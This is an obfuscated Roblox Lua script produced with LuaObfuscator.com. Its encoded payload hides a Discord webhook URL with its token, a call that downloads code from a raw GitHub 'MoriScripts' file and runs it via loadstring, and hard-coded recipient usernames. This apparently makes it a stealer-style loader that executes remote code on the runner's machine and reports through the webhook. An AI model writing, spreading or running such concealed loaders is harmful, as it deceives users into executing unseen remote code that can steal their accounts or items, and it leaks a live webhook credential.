--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==2) then function v22()local v31=v1(v16,v19,v19);v19=v19 + 1 ;return v31;end v23=nil;function v23()local v32,v33=v1(v16,v19,v19 + (5 -3) );v19=v19 + (3 -1) ;return (v33 * (800 -544)) + v32 ;end v18=3;end if (v18==4) then function v25()local v34=v24();local v35=v24();local v36=620 -((1018 -463) + 64) ;local v37=(v21(v35,932 -(857 + 74) ,588 -(367 + 201) ) * ((929 -(214 + 713))^(9 + (373 -(87 + 263))))) + v34 ;local v38=v21(v35,4 + 17 ,908 -(282 + 595) );local v39=((v21(v35,32)==(1638 -(1523 + (294 -(67 + 113))))) and  -(1 + 0)) or 1 ;if (v38==(0 -0)) then if (v37==(1065 -(68 + 997))) then return v39 * ((932 + 338) -(226 + (2562 -1518))) ;else v38=4 -3 ;v36=117 -(32 + 85) ;end elseif (v38==(2007 + 40)) then return ((v37==0) and (v39 * ((1 + 0)/0))) or (v39 * NaN) ;end return v8(v39,v38-(1980 -(892 + 65)) ) * (v36 + (v37/((4 -2)^(95 -43)))) ;end v26=nil;function v26(v40)local v41;if  not v40 then local v82=0 + 0 ;while true do if (v82==(0 -0)) then v40=v24();if (v40==(0 -0)) then return "";end break;end end end v41=v3(v16,v19,(v19 + v40) -(953 -(802 + 150)) );v19=v19 + v40 ;local v42={};for v66=2 -(1 + 0) , #v41 do v42[v66]=v2(v1(v3(v41,v66,v66)));end return v6(v42);end v18=5;end if (v18==6) then v29=nil;function v29()local v43=0 -0 ;local v44;local v45;local v46;local v47;local v48;local v49;local v50;while true do if ((1637 -(1373 + 263))~=v43) then else local v89=1000 -(451 + 549) ;while true do if (v89==(0 + 0)) then local v102=0;while true do if (v102==(0 -0)) then v46=nil;v47=nil;v102=1 -0 ;end if (v102==(1385 -(746 + 638))) then v89=1;break;end end end if (1==v89) then v43=1 + 1 ;break;end end end if (v43==(4 -1)) then v50=nil;while true do local v92=341 -(218 + 123) ;local v93;while true do if (v92~=0) then else v93=0;while true do if (0==v93) then if (v44==(1583 -(1535 + 46))) then local v104=0 + 0 ;local v105;local v106;while true do if (v104==0) then v105=0 + 0 ;v106=nil;v104=1;end if (v104==(561 -(306 + 254))) then while true do if (v105==(0 + 0)) then v106=0 -0 ;while true do if ((1467 -(899 + 568))==v106) then local v171=0;local v172;while true do if (v171==(0 + 0)) then v172=0;while true do if (v172==(0 -0)) then for v183=604 -(268 + 335) ,v24() do local v184=0;local v185;local v186;while true do if (v184~=0) then else v185=290 -(60 + 230) ;v186=nil;v184=573 -(426 + 146) ;end if (v184==1) then while true do if (v185~=(0 + 0)) then else v186=v22();if (v21(v186,1,1)~=(1456 -(282 + 1174))) then else local v190=0;local v191;local v192;local v193;local v194;local v195;while true do if (1==v190) then v193=nil;v194=nil;v190=813 -(569 + 242) ;end if (v190==(5 -3)) then v195=nil;while true do if ((1 + 0)==v191) then local v196=1024 -(706 + 318) ;while true do if (v196==1) then v191=1253 -(721 + 530) ;break;end if (v196==0) then v194=nil;v195=nil;v196=1272 -(945 + 326) ;end end end if (v191~=0) then else local v197=0;while true do if (v197==1) then v191=2 -1 ;break;end if (v197==0) then v192=0;v193=nil;v197=1;end end end if (v191==2) then while true do if (v192~=0) then else local v198=0;local v199;while true do if (v198~=(0 + 0)) then else v199=0;while true do if (v199~=1) then else v192=1;break;end if (v199==(700 -(271 + 429))) then local v207=0 + 0 ;while true do if (0~=v207) then else v193=v21(v186,1502 -(1408 + 92) ,3);v194=v21(v186,4,1092 -(461 + 625) );v207=1289 -(993 + 295) ;end if (v207==1) then v199=1 + 0 ;break;end end end end break;end end end if (v192==(1173 -(418 + 753))) then local v200=0 + 0 ;local v201;while true do if (v200==(0 + 0)) then v201=0;while true do if (v201~=0) then else local v208=0 + 0 ;while true do if ((1 + 0)~=v208) then else v201=1;break;end if (v208~=(529 -(406 + 123))) then else if (v21(v194,1,1)~=1) then else v195[2]=v50[v195[2]];end if (v21(v194,1771 -(1749 + 20) ,2)~=(1 + 0)) then else v195[1325 -(1249 + 73) ]=v50[v195[3]];end v208=1 + 0 ;end end end if (v201==1) then v192=1148 -(466 + 679) ;break;end end break;end end end if ((6 -3)~=v192) then else if (v21(v194,3,8 -5 )==1) then v195[4]=v50[v195[1904 -(106 + 1794) ]];end v45[v183]=v195;break;end if (v192~=(1 + 0)) then else local v203=0 + 0 ;local v204;while true do if (v203==(0 -0)) then v204=0 -0 ;while true do if (v204==1) then v192=2;break;end if (v204==(114 -(4 + 110))) then local v209=584 -(57 + 527) ;while true do if (v209==0) then v195={v23(),v23(),nil,nil};if (v193==0) then local v214=0;local v215;local v216;local v217;while true do if (v214==1) then v217=nil;while true do if (v215==(1 -0)) then while true do if (v216==0) then v217=0 -0 ;while true do if (v217==(166 -(122 + 44))) then v195[3]=v23();v195[4]=v23();break;end end break;end end break;end if ((0 -0)==v215) then local v220=0 -0 ;while true do if ((0 + 0)==v220) then v216=0;v217=nil;v220=1;end if (v220==(1 + 0)) then v215=1 -0 ;break;end end end end break;end if (0==v214) then v215=0;v216=nil;v214=66 -(30 + 35) ;end end elseif (v193==(1 + 0)) then v195[3]=v24();elseif (v193==2) then v195[3]=v24() -((1259 -(1043 + 214))^16) ;elseif (v193==(11 -8)) then local v221=1212 -(323 + 889) ;local v222;local v223;while true do if (v221~=(2 -1)) then else while true do if (v222==0) then v223=580 -(361 + 219) ;while true do if ((320 -(53 + 267))~=v223) then else v195[3]=v24() -((1 + 1)^(429 -(15 + 398))) ;v195[986 -(18 + 964) ]=v23();break;end end break;end end break;end if (v221~=(0 -0)) then else v222=0;v223=nil;v221=1 + 0 ;end end end v209=1;end if (v209==1) then v204=1 + 0 ;break;end end end end break;end end end end break;end end break;end if (v190~=(850 -(20 + 830))) then else v191=0 + 0 ;v192=nil;v190=127 -(116 + 10) ;end end end break;end end break;end end end for v187=1 + 0 ,v24() do v46[v187-(739 -(542 + 196)) ]=v29();end v172=1 -0 ;end if ((1 + 0)==v172) then v106=1 + 0 ;break;end end break;end end end if (v106~=(1 + 0)) then else return v48;end end break;end end break;end end end if ((2 -1)~=v44) then else local v107=0;local v108;local v109;while true do if (v107==(0 -0)) then v108=1551 -(1126 + 425) ;v109=nil;v107=406 -(118 + 287) ;end if (v107~=1) then else while true do if (v108==0) then v109=0 -0 ;while true do if (v109==0) then local v173=0;while true do if (v173==0) then local v175=1121 -(118 + 1003) ;while true do if (v175~=1) then else v173=2 -1 ;break;end if (v175==(377 -(142 + 235))) then v49=v24();v50={};v175=1;end end end if (v173==(4 -3)) then v109=1 + 0 ;break;end end end if (v109==1) then local v174=0;while true do if (v174~=1) then else v109=2;break;end if (v174==(977 -(553 + 424))) then for v178=1 -0 ,v49 do local v179=0 + 0 ;local v180;local v181;local v182;while true do if (v179==(1 + 0)) then v182=nil;while true do if (v180~=(0 + 0)) then else v181=v22();v182=nil;v180=1 + 0 ;end if (v180==(1 + 0)) then if (v181==1) then v182=v22()~=(0 -0) ;elseif (v181==2) then v182=v25();elseif (v181==3) then v182=v26();end v50[v178]=v182;break;end end break;end if (v179==0) then v180=0 -0 ;v181=nil;v179=1;end end end v48[6 -3 ]=v22();v174=1 + 0 ;end end end if (v109==2) then v44=2;break;end end break;end end break;end end end v93=4 -3 ;end if (1==v93) then if ((753 -(239 + 514))==v44) then local v110=0;local v111;while true do if (0~=v110) then else v111=0;while true do if (v111==2) then v44=1 + 0 ;break;end if (v111==(1329 -(797 + 532))) then local v159=0 + 0 ;local v160;while true do if ((0 + 0)==v159) then v160=0 -0 ;while true do if (v160~=1) then else v111=1203 -(373 + 829) ;break;end if (0==v160) then local v177=731 -(476 + 255) ;while true do if ((1131 -(369 + 761))~=v177) then else v160=1 + 0 ;break;end if (v177==(0 -0)) then v45={};v46={};v177=1 -0 ;end end end end break;end end end if (v111==1) then local v161=0;local v162;while true do if (v161~=(238 -(64 + 174))) then else v162=0;while true do if (v162==1) then v111=1 + 1 ;break;end if (v162==0) then v47={};v48={v45,v46,nil,v47};v162=1;end end break;end end end end break;end end end break;end end break;end end end break;end if (v43==(0 + 0)) then local v90=0;while true do if (0==v90) then local v103=0;while true do if (v103~=(0 + 0)) then else v44=1504 -(363 + 1141) ;v45=nil;v103=1581 -(1183 + 397) ;end if (v103~=(2 -1)) then else v90=1;break;end end end if ((1 + 0)==v90) then v43=1;break;end end end if (2==v43) then local v91=0 + 0 ;while true do if (v91==1) then v43=3;break;end if (v91~=(1975 -(1913 + 62))) then else v48=nil;v49=nil;v91=1 + 0 ;end end end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v51)if (v1(v51,2)==79) then v20=v0(v3(v51,1,1));return "";else local v83=v2(v0(v51,16));if v20 then local v94=0;local v95;while true do if (v94==1) then return v95;end if (v94==0) then v95=v5(v83,v20);v20=nil;v94=1;end end else return v83;end end end);v18=1;end if (v18==3) then v24=nil;function v24()local v52=0;local v53;local v54;local v55;local v56;while true do if (v52==(0 -(0 -0))) then v53,v54,v55,v56=v1(v16,v19,v19 + (8 -5) );v19=v19 + (1937 -(565 + 1368)) ;v52=(307 -(244 + 60)) -(2 + 0) ;end if (v52==(1662 -(1477 + 184))) then return (v56 * (22860349 -6083133)) + (v55 * (61064 + 4472)) + (v54 * (1112 -(564 + 292))) + v53 ;end end end v25=nil;v18=4;end if (v18==7) then function v30(v57,v58,v59)local v60=v57[1];local v61=v57[2];local v62=v57[3];return function(...)local v68=v60;local v69=v61;local v70=v62;local v71=v28;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v84=0,v76 do if (v84>=v70) then v74[v84-v70 ]=v75[v84 + 1 ];else v78[v84]=v75[v84 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do local v85=0;while true do if (v85==1) then if (v81<=10) then if (v81<=4) then if (v81<=1) then if (v81==0) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end else v78[v80[2]]=v80[3];end elseif (v81<=2) then local v114=0;local v115;while true do if (v114==0) then v115=v80[2];v78[v115]=v78[v115](v13(v78,v115 + 1 ,v73));break;end end elseif (v81==3) then do return;end elseif (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81<=7) then if (v81<=5) then do return;end elseif (v81>6) then v72=v80[3];else v78[v80[2]][v80[3]]=v80[4];end elseif (v81<=8) then v78[v80[2]]();elseif (v81==9) then v78[v80[2]]=v80[3];else v78[v80[2]]=v59[v80[3]];end elseif (v81<=15) then if (v81<=12) then if (v81==11) then v78[v80[2]]=v80[3]~=0 ;else local v117=0;local v118;local v119;local v120;local v121;while true do if (1==v117) then v73=(v120 + v118) -1 ;v121=0;v117=2;end if (v117==0) then v118=v80[2];v119,v120=v71(v78[v118](v13(v78,v118 + 1 ,v80[3])));v117=1;end if (v117==2) then for v157=v118,v73 do local v158=0;while true do if (v158==0) then v121=v121 + 1 ;v78[v157]=v119[v121];break;end end end break;end end end elseif (v81<=13) then v78[v80[2]]();elseif (v81==14) then v78[v80[2]]=v80[3]~=0 ;else local v134=0;local v135;local v136;local v137;local v138;while true do if (v134==1) then v73=(v137 + v135) -1 ;v138=0;v134=2;end if (v134==2) then for v166=v135,v73 do v138=v138 + 1 ;v78[v166]=v136[v138];end break;end if (v134==0) then v135=v80[2];v136,v137=v71(v78[v135](v13(v78,v135 + 1 ,v80[3])));v134=1;end end end elseif (v81<=18) then if (v81<=16) then v72=v80[3];elseif (v81==17) then local v139=v80[2];local v140=v78[v80[3]];v78[v139 + 1 ]=v140;v78[v139]=v140[v80[4]];else local v144=v80[2];local v145=v78[v80[3]];v78[v144 + 1 ]=v145;v78[v144]=v145[v80[4]];end elseif (v81<=19) then v78[v80[2]][v80[3]]=v80[4];elseif (v81>20) then v78[v80[2]]=v59[v80[3]];else local v151=0;local v152;while true do if (v151==0) then v152=v80[2];v78[v152]=v78[v152](v13(v78,v152 + 1 ,v73));break;end end end v72=v72 + 1 ;break;end if (0==v85) then v80=v68[v72];v81=v80[1];v85=1;end end end end;end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v63,v64,v65)if v65 then local v86=476 -(41 + (2310 -(157 + 1718))) ;local v87;while true do if (v86==(1001 -(938 + 63))) then v87=(v63/((2 + 0)^(v64-(1126 -(936 + 189)))))%((1 + 1)^(((v65-(1 -0)) -(v64-1)) + (1614 -(1565 + 48)))) ;return v87-(v87%(1 + 0)) ;end end else local v88=(2 + (0 -0))^(v64-(1139 -((1874 -(975 + 117)) + 356))) ;return (((v63%(v88 + v88))>=v88) and (268 -((601 -425) + 91))) or (0 -0) ;end end v22=nil;v18=2;end end end v15("LOL!0C3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3132333533353732383237303339373436312F767A6A313677576D4A65786E45594463425432615747594F306B6C446A6B783069524F52735068343739523634655550382D41616B653644626942596D574F717336754A030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A03083O00557365724E616D6503093O00537469636B4F2O777A03093O00557365724E616D653200173O0012013O00013O0026043O000E000100020004103O000E0001001215000100033O003006000100040005001215000100063O001215000200073O002012000200020008001201000400094O000B000500014O000C000200054O001400013O00022O00080001000100010004103O001600010026043O0001000100010004103O00010001001215000100033O0030060001000A000B001215000100033O0030060001000C000B0012013O00023O0004103O000100012O00033O00017O00",v9(),...);end
